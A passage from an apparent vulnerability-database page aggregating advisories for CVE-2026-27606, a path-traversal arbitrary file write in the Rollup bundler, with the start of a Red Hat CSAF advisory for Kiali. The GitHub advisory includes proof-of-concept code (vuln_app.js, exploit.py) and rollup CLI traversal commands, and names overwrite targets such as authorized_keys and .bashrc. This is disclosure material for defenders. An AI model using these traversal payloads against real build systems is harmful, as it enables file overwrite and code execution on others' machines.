"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-27606"
}
]
}
GHSA-MW96-CPMX-2VGC
Vulnerability from github – Published: 2026-02-25 22:37 – Updated: 2026-02-25 22:37
VLAI?
Summary
Rollup 4 has Arbitrary File Write via Path Traversal
Details
Summary
The Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (../) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.
Details
The vulnerability is caused by the combination of two flawed components in the Rollup core:
-
Improper Sanitization: In
src/utils/sanitizeFileName.ts, theINVALID_CHAR_REGEXused to clean user-provided names for chunks and assets excludes the period (.) and forward/backward slashes (/,\).typescript // src/utils/sanitizeFileName.ts (Line 3) const INVALID_CHAR_REGEX = /[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g;This allows path traversal sequences like../../to pass through the sanitizer unmodified. -
Unsafe Path Resolution: In
src/rollup/rollup.ts, thewriteOutputFilefunction usespath.resolveto combine the output directory with the "sanitized" filename.typescript // src/rollup/rollup.ts (Line 317) const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);Becausepath.resolvefollows the../sequences inoutputFile.fileName, the resulting path points outside of the intended output directory. The subsequent call tofs.writeFilecompletes the arbitrary write.
PoC
A demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.
Scenario: CLI Named Input Exploit
1. Target a sensitive file location (for demonstration, we will use a file in the project root called pwned.js).
2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:
bash
rollup --input "a/../../pwned.js=main.js" --dir dist
3. Result: Rollup will resolve the output path for the entry chunk as dist + a/../../pwned.js, which resolves to the project root. The file pwned.js is created/overwritten outside the dist folder.
Reproduction Files provided :
* vuln_app.js: Isolated logic exactly replicating the sanitization and resolution bug.
* exploit.py: Automated script to run the PoC and verify the file escape.
vuln_app.js
const path = require('path');
const fs = require('fs');
/**
* REPLICATED ROLLUP VULNERABILITY
*
* 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)
* 2. Unsafe Path Resolution (from src/rollup/rollup.ts)
*/
function sanitize(name) {
// The vulnerability: Rollup's regex fails to strip dots and slashes,
// allowing path traversal sequences like '../'
return name.replace(/[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g, '_');
}
async function build(userSuppliedName) {
const outputDir = path.join(__dirname, 'dist');
const fileName = sanitize(userSuppliedName);
// Vulnerability: path.resolve() follows traversal sequences in the filename
const outputPath = path.resolve(outputDir, fileName);
console.log(`[*] Target write path: ${outputPath}`);
if (!fs.existsSync(path.dirname(outputPath))) {
fs.mkdirSync(path.dirname(outputPath), { recursive: true });
}
fs.writeFileSync(outputPath, 'console.log("System Compromised!");');
console.log(`[+] File written successfully.`);
}
build(process.argv[2] || 'bundle.js');
exploit.py
import subprocess
from pathlib import Path
def run_poc():
# Target a file outside the 'dist' folder
poc_dir = Path(__file__).parent
malicious_filename = "../pwned_by_rollup.js"
target_path = poc_dir / "pwned_by_rollup.js"
print(f"=== Rollup Path Traversal PoC ===")
print(f"[*] Malicious Filename: {malicious_filename}")
# Trigger the vulnerable app
subprocess.run(["node", "poc/vuln_app.js", malicious_filename])
if target_path.exists():
print(f"[SUCCESS] File escaped 'dist' folder!")
print(f"[SUCCESS] Created: {target_path}")
# target_path.unlink() # Cleanup
else:
print("[FAILED] Exploit did not work.")
if __name__ == "__main__":
run_poc()
POC
rollup --input "bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js" --dir dist
Impact
This is a High level of severity vulnerability.
* Arbitrary File Write: Attackers can overwrite sensitive files like ~/.ssh/authorized_keys, .bashrc, or system binaries if the build process has sufficient privileges.
* Supply Chain Risk: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.
* User Impact: Developers running builds on untrusted repositories are at risk of system compromise.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "rollup"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.80.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "rollup"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.30.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "rollup"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.59.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27606"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T22:37:26Z",
"nvd_published_at": "2026-02-25T03:16:04Z",
"severity": "HIGH"
},
"details": "### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). \n ```typescript\n // src/utils/sanitizeFileName.ts (Line 3)\n const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%\u0026*+,:;\u003c=\u003e?[\\]^`{|}\\u007F]/g;\n ```\n This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n ```typescript\n // src/rollup/rollup.ts (Line 317)\n const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n ```\n Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n ```bash\n rollup --input \"a/../../pwned.js=main.js\" --dir dist\n ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require(\u0027path\u0027);\nconst fs = require(\u0027fs\u0027);\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n // The vulnerability: Rollup\u0027s regex fails to strip dots and slashes, \n // allowing path traversal sequences like \u0027../\u0027\n return name.replace(/[\\u0000-\\u001F\"#$%\u0026*+,:;\u003c=\u003e?[\\]^`{|}\\u007F]/g, \u0027_\u0027);\n}\n\nasync function build(userSuppliedName) {\n const outputDir = path.join(__dirname, \u0027dist\u0027);\n const fileName = sanitize(userSuppliedName);\n\n // Vulnerability: path.resolve() follows traversal sequences in the filename\n const outputPath = path.resolve(outputDir, fileName);\n\n console.log(`[*] Target write path: ${outputPath}`);\n\n if (!fs.existsSync(path.dirname(outputPath))) {\n fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n }\n\n fs.writeFileSync(outputPath, \u0027console.log(\"System Compromised!\");\u0027);\n console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || \u0027bundle.js\u0027);\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n # Target a file outside the \u0027dist\u0027 folder\n poc_dir = Path(__file__).parent\n malicious_filename = \"../pwned_by_rollup.js\"\n target_path = poc_dir / \"pwned_by_rollup.js\"\n\n print(f\"=== Rollup Path Traversal PoC ===\")\n print(f\"[*] Malicious Filename: {malicious_filename}\")\n \n # Trigger the vulnerable app\n subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n if target_path.exists():\n print(f\"[SUCCESS] File escaped \u0027dist\u0027 folder!\")\n print(f\"[SUCCESS] Created: {target_path}\")\n # target_path.unlink() # Cleanup\n else:\n print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n\u003cimg width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" /\u003e\n\n\n\n### Impact\nThis is a **High** level of severity vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer\u0027s machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.",
"id": "GHSA-mw96-cpmx-2vgc",
"modified": "2026-02-25T22:37:26Z",
"published": "2026-02-25T22:37:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"type": "PACKAGE",
"url": "https://github.com/rollup/rollup"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Rollup 4 has Arbitrary File Write via Path Traversal"
}
RHSA-2026:5132
Vulnerability from csaf_redhat - Published: 2026-03-19 14:09 - Updated: 2026-03-26 15:39Summary
Red Hat Security Advisory: Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6
Severity
Important
Notes
Topic: Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details: Kiali 1.73.28, for Red Hat OpenShift Service Mesh 2.6, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently.
Security Fix(es):
* kiali-rhel8: Memory exhaustion in query parameter parsing in net/url (CVE-2025-61726)
* kiali-rhel8: Rollup: Remote Code Execution via Path Traversal Vulnerability (CVE-2026-27606)
* kiali-rhel8: Unexpected session resumption in crypto/tls (CVE-2025-68121)
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
7.5 (High)
Vendor Fix
See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x
https://access.redhat.com/errata/RHSA-2026:5132
Workaround
Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.
During session resumption in crypto/tls, if the underlying Config has its ClientCAs or RootCAs fields mutated between the initial handshake and the resumed handshake, the resumed handshake may succeed when it should have failed. This may happen when a user calls Config.Clone and mutates the returned Config, or uses Config.GetConfigForClient. This can cause a client to resume a session with a server that it would not have resumed with during the initial handshake, or cause a server to resume a session with a client that it would not have resumed with during the initial handshake.
7.4 (High)
Vendor Fix
See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x
https://access.redhat.com/errata/RHSA-2026:5132
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x
https://access.redhat.com/errata/RHSA-2026:5132
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Kiali 1.73.28, for Red Hat OpenShift Service Mesh 2.6, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently.\n\nSecurity Fix(es):\n\n* kiali-rhel8: Memory exhaustion in query parameter parsing in net/url (CVE-2025-61726)\n\n* kiali-rhel8: Rollup: Remote Code Execution via Path Traversal Vulnerability (CVE-2026-27606)\n\n* kiali-rhel8: Unexpected session resumption in crypto/tls (CVE-2025-68121)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5132",
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2025-61726",
"url": "https://access.redhat.com/security/cve/cve-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2025-68121",
"url": "https://access.redhat.com/security/cve/cve-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2026-27606",
"url": "https://access.redhat.com/security/cve/cve-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification",
"url": "https://access.redhat.com/security/updates/classification"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5132.json"
}
],
"title": "Red Hat Security Advisory: Kiali 1.73.28 for Red Hat OpenShift Service Mesh 2.6",
"tracking": {
"current_release_date": "2026-03-26T15:39:21+00:00",
"generator": {
"date": "2026-03-26T15:39:21+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.4"
}
},
"id": "RHSA-2026:5132",
"initial_release_date": "2026-03-19T14:09:55+00:00",
"revision_history": [
{
"date": "2026-03-19T14:09:55+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-19T14:10:03+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-03-26T15:39:21+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Service Mesh 2.6",
"product": {
"name": "Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3Ac37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3A708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3Aaf899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3Aa51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059917"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3A5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1773059840"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
